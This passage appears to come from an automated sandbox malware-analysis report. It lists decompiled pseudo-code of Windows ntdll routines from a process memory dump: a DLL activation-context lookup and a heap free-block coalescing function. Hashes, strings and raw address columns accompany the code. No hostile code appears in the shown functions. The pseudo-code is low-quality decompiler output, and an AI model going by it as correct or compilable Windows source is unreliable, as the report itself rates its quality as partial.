HEAP: , xrefs: 04651DE4
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 04651DF9
HEAP[%wZ]: , xrefs: 04651DD7

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 2994545307-2586055223
Opcode ID: 88fa24ce3fd6e6e840be27f106ffdcca7dc0be9ad6e7a069a98282a2a74e389a
Instruction ID: c75c9233802ec42399be3b2e242b768afdf42c52ddce263fd704503e91d3eaf0
Opcode Fuzzy Hash: 88fa24ce3fd6e6e840be27f106ffdcca7dc0be9ad6e7a069a98282a2a74e389a
Instruction Fuzzy Hash: D751F0723057809FE326DBA8C844FA777E8FB91B54F084569E8518B3E1F625F901CB22

Uniqueness

Uniqueness Score: -1.00%

Function 04618E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04618E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x46dd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x46d8464; // 0x76c90110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x46d5780 & 0x00000003) != 0) {
							E04665510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x46d5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0462B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x46d7984; // 0xa02ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x46d8464; // 0x76c90110
					 *0x46db1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04619B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x46d5780 & 0x00000005) != 0) {
						_push(_t49);
						E04665510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04618e0f
0x04618e16
0x04618e19
0x04618e1b
0x04618e21
0x04618e7f
0x04618e85
0x04659354
0x0465936c
0x04659371
0x0465937b
0x04659381
0x04659381
0x0465937b
0x04618e9d
0x04618e9d
0x04618e29
0x04618e2c
0x04618e38
0x04618e3e
0x04618e43
0x04618eb5
0x04618eb9
0x046592aa
0x046592af
0x046592e8
0x046592e8
0x046592af
0x04618eb9
0x04618e45
0x04618e53
0x04618e5b
0x04618e5f
0x04618e78
0x04618e78
0x04618e7d
0x04618ec3
0x04618ecd
0x04618ed2
0x04618ed2
0x04618ec5
0x04618ec5
0x00000000
0x04618e7d
0x04618e67
0x04618ea4
0x0465931a
0x00000000
0x00000000
0x04659320
0x04618ea4
0x04618e70
0x04659325
0x04659340
0x04659345
0x04659345
0x04618e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0465932A
Querying the active activation context failed with status 0x%08lx, xrefs: 04659357
minkernel\ntdll\ldrsnap.c, xrefs: 0465933B, 04659367
LdrpFindDllActivationContext, xrefs: 04659331, 0465935D

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 8c1b1e7f2650d60df2883fc7afa8a1f48ba3c31636bae1a299f9a7656bcf3ac7
Instruction ID: 6caed0fd930c5b27875bc9cdb034f077817343bc205d4eb7477f3c4119b8276c
Opcode Fuzzy Hash: 8c1b1e7f2650d60df2883fc7afa8a1f48ba3c31636bae1a299f9a7656bcf3ac7
Instruction Fuzzy Hash: A3411232E00311EFDB31BE5888C9A7AB6A5FB51308F0E812AE80597671F770BD80D6C1

Uniqueness

Uniqueness Score: -1.00%

Function 046A49A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 046A4A4A, 046A4A5D, 046A4A5F, 046A4AC4
This is located in the %s field of the heap header., xrefs: 046A4AD6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 046A4A61
HEAP[%wZ]: , xrefs: 046A4A3D, 046A4AB7

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 0343eb7376ce582c80367abf5049be6e4fe02ba3ae01e9861297f777d43c686b
Instruction ID: 5494186086773762ef3fe0cf8c8909ed52af167c5a52fd2b1590570e006aba23
Opcode Fuzzy Hash: 0343eb7376ce582c80367abf5049be6e4fe02ba3ae01e9861297f777d43c686b
Instruction Fuzzy Hash: 7A311036201911EFD324DBA9CC85F6673A8FF00725F184059F6068B245FAB1BE60EE69

Uniqueness

Uniqueness Score: -1.00%

Function 046099BF Relevance: 4.3, Strings: 3, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E046099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0469FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E046AA80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E0463D540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E045EB150();
										} else {
											E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E045EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x46d6378 = 1;
											asm("int3");
											 *0x46d6378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0460A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0460A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0460BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E046AA80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0460A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0460A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E0463D540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E045EB150();
								} else {
									E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E045EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x46d6378 = 1;
									asm("int3");
									 *0x46d6378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0469FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E046AA80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E0463D540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E045EB150();
													} else {
														E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E045EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x46d6378 = 1;
														asm("int3");
														 *0x46d6378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0460A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0460A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0460BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E046AA80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0463D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E045EB150();
													} else {
														E045EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E045EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x46d6378 = 1;
														asm("int3");
														 *0x46d6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0460A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0460A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0460BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0460BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}

0x046099ca
0x046099cc
0x046099df
0x046099e3
0x046099f8
0x046099fb
0x046099fb
0x00000000
0x04609a48
0x04609a48
0x04609a4c
0x04609a51
0x04609a55
0x04609a61
0x04609a66
0x04609a68
0x04651457
0x0465145c
0x0465145c
0x04609a68
0x04609a6e
0x04609a71
0x04609a74
0x04609a76
0x04651466
0x04651469
0x04651469
0x0465146c
0x0465146e
0x04651471
0x04651474
0x04651477
0x04651479
0x0465159c
0x0465159c
0x0465159d
0x046515a6
0x046515ab
0x046515ab
0x00000000
0x046515ab
0x0465147f
0x04651481
0x00000000
0x00000000
0x0465148a
0x0465148d
0x04651493
0x04651495
0x046514c0
0x046514c0
0x046514c3
0x046514c6
0x046514c8
0x046514cb
0x046514cf
0x046514f2
0x046514f2
0x046514f5
0x046514f8
0x04651501
0x04651508
0x0465150b
0x0465150e
0x04651510
0x04651513
0x04651515
0x04651515
0x04651518
0x04651518
0x04651513
0x04651521
0x04651525
0x0465152a
0x0465152d
0x04651530
0x04651532
0x04651539
0x0465153d
0x0465155d
0x04651562
0x0465153f
0x04651555
0x0465155a
0x04651570
0x04651577
0x0465157c
0x04651582
0x04651585
0x04651589
0x0465158b
0x04651592
0x04651593
0x04651593
0x04651589
0x04651530
0x00000000
0x046514f8
0x046514d5
0x046514da
0x046514dc
0x00000000
0x046514de
0x046514e8
0x00000000
0x046514e8
0x04651497
0x04651497
0x046514a4
0x046514a4
0x046514a7
0x046514a9
0x046514ab
0x046514ab
0x0465149c
0x0465149e
0x046514a0
0x046514b0
0x046514b0
0x00000000
0x046514a2
0x046514a2
0x00000000
0x046514a2
0x046514a0
0x046514b3
0x046514bb
0x00000000
0x046514bb
0x04651495
0x04609a7c
0x04609a7c
0x04609a7f
0x04609a7f
0x04609a82
0x04609a84
0x04609a87
0x04609a8a
0x04609a8d
0x04609a8f
0x0465166a
0x0465166a
0x0465166b
0x04651674
0x00000000
0x04651674
0x04609a95
0x04609a97
0x00000000
0x00000000
0x04609aa0
0x04609aa3
0x04609aa9
0x04609aab
0x04609ad7
0x04609ad7
0x04609ada
0x04609add
0x04609adf
0x04609ae2
0x04609ae6
0x04609b22
0x04609b27
0x04609b29
0x00000000
0x04609b2b
0x046515be
0x00000000
0x046515be
0x04609b29
0x04609ae8
0x04609ae8
0x04609aeb
0x04609aee
0x046515cb
0x046515d2
0x046515d5
0x046515d7
0x046515da
0x046515dc
0x046515dc
0x046515dc
0x046515da
0x046515e5
0x046515e9
0x046515ee
0x046515f1
0x046515f3
0x046515f9
0x04651600
0x04651604
0x04651624
0x04651629
0x04651606
0x0465161c
0x04651621
0x04651637
0x0465163e
0x04651643
0x04651649
0x0465164c
0x04651650
0x04651656
0x0465165d
0x0465165e
0x0465165e
0x04651650
0x046515f3
0x04609af4
0x04609af7
0x04609afc
0x04609b00
0x04609b04
0x04609b08
0x04609b14
0x046099fe
0x04609a04
0x04609a07
0x00000000
0x04609a29
0x0465169c
0x046516a0
0x046516a5
0x046516a9
0x046516b5
0x046516ba
0x046516bc
0x046516be
0x046516c3
0x046516c3
0x046516bc
0x046516c8
0x046516cc
0x0465181b
0x0465181b
0x0465181e
0x0465181e
0x04651821
0x04651823
0x04651826
0x04651829
0x0465182c
0x0465182e
0x04651688
0x04651688
0x04651689
0x0465168b
0x0465168c
0x0465168d
0x0465168f
0x04651692
0x00000000
0x04651692
0x04651834
0x04651836
0x00000000
0x00000000
0x0465183f
0x04651842
0x04651848
0x0465184a
0x04651875
0x04651875
0x04651878
0x0465187b
0x0465187d
0x04651880
0x04651884
0x046518a7
0x046518a7
0x046518aa
0x046518ad
0x046518b6
0x046518bd
0x046518c0
0x046518c3
0x046518c5
0x046518c8
0x046518ca
0x046518ca
0x046518cd
0x046518cd
0x046518c8
0x046518d5
0x046518da
0x046518df
0x046518e2
0x046518e5
0x046518e7
0x046518ee
0x046518f2
0x04651912
0x04651917
0x046518f4
0x0465190a
0x0465190f
0x04651925
0x0465192c
0x04651931
0x0465193a
0x0465193e
0x04651940
0x04651947
0x04651948
0x04651948
0x0465193e
0x046518e5
0x0465194f
0x04651952
0x04651956
0x0465195d
0x04651961
0x0465196d
0x00000000
0x0465196d
0x0465188a
0x0465188f
0x04651891
0x00000000
0x00000000
0x0465189d
0x00000000
0x0465189d
0x0465184c
0x04651859
0x04651859
0x0465185c
0x00000000
0x00000000
0x04651851
0x04651853
0x04651855
0x04651865
0x04651865
0x04651866
0x04651868
0x04651870
0x00000000
0x04651870
0x04651857
0x04651857
0x0465185e
0x00000000
0x046516d2
0x046516d2
0x046516d5
0x046516d5
0x046516d8
0x046516da
0x046516dd
0x046516e0
0x046516e3
0x046516e5
0x04651808
0x04651808
0x04651809
0x04651812
0x04651817
0x04651817
0x00000000
0x04651817
0x046516eb
0x046516ed
0x00000000
0x00000000
0x046516f6
0x046516f9
0x046516ff
0x04651701
0x0465172c
0x0465172c
0x0465172f
0x04651732
0x04651734
0x04651737
0x0465173b
0x0465175e
0x0465175e
0x04651761
0x04651764
0x0465176d
0x04651774
0x04651777
0x0465177a
0x0465177c
0x0465177f
0x04651781
0x04651781
0x04651784
0x04651784
0x0465177f
0x0465178c
0x04651791
0x04651796
0x04651799
0x0465179c
0x0465179e
0x046517a5
0x046517a9
0x046517c9
0x046517ce
0x046517ab
0x046517c1
0x046517c6
0x046517dc
0x046517e3
0x046517e8
0x046517ee
0x046517f1
0x046517f5
0x046517f7
0x046517fe
0x046517ff
0x046517ff
0x046517f5
